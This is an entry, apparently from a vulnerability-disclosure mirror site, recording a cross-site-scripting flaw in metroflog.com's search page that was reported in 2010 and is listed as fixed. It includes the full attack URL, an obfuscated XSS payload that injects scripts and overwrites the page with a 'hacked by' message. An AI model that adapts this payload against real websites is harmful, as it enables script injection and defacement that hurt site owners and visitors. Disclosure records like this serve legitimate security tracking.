Security researcher sh3n, has submitted on 17/10/2010 a cross-site-scripting (XSS) vulnerability affecting www.metroflog.com, which at the time of submission ranked 11039 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 02/04/2012. It is currently fixed. |
Date submitted: 17/10/2010 |
Date published: 02/04/2012 |
Date fixed: 02/04/2012 | Status: FIXED |
Author: sh3n |
Domain: www.metroflog.com |
Category: XSS |
Pagerank: 11039 |
URL: http://www.metroflog.com/search.php?cx=partner-pub-7814731125428179%3A2tu1mep6cd2&cof=FORID%3A10&ie= ISO-8859-1&q=%22%2B{valueOf%3Alocation%2C+toString%3A+[].join%2C0%3A%27jav\x61script%3Aalert+\x280%2 9%27%2Clength%3A1}%2F%2F+%3Cscript%3Ealert%28%22pwned%22%29%3C%2Fscript%3E+%3Cscript%3Ealert%28%22by %22%29%3C%2Fscript%3E+%3Cscript%3Ealert%28%22sh3n%22%29%3C%2Fscript%3E+%3Cscript%3Efunction+do_main% 28%29{+%09document.body.innerHTML+%3D+%22%3Ch1%3EXSHacked+by+sh3n%22%3B+}++do_main%28%29%3B+%3C%2Fsc ript%3E+%2F%2F&sa=Buscar |
Click here to view the mirror
|
|
|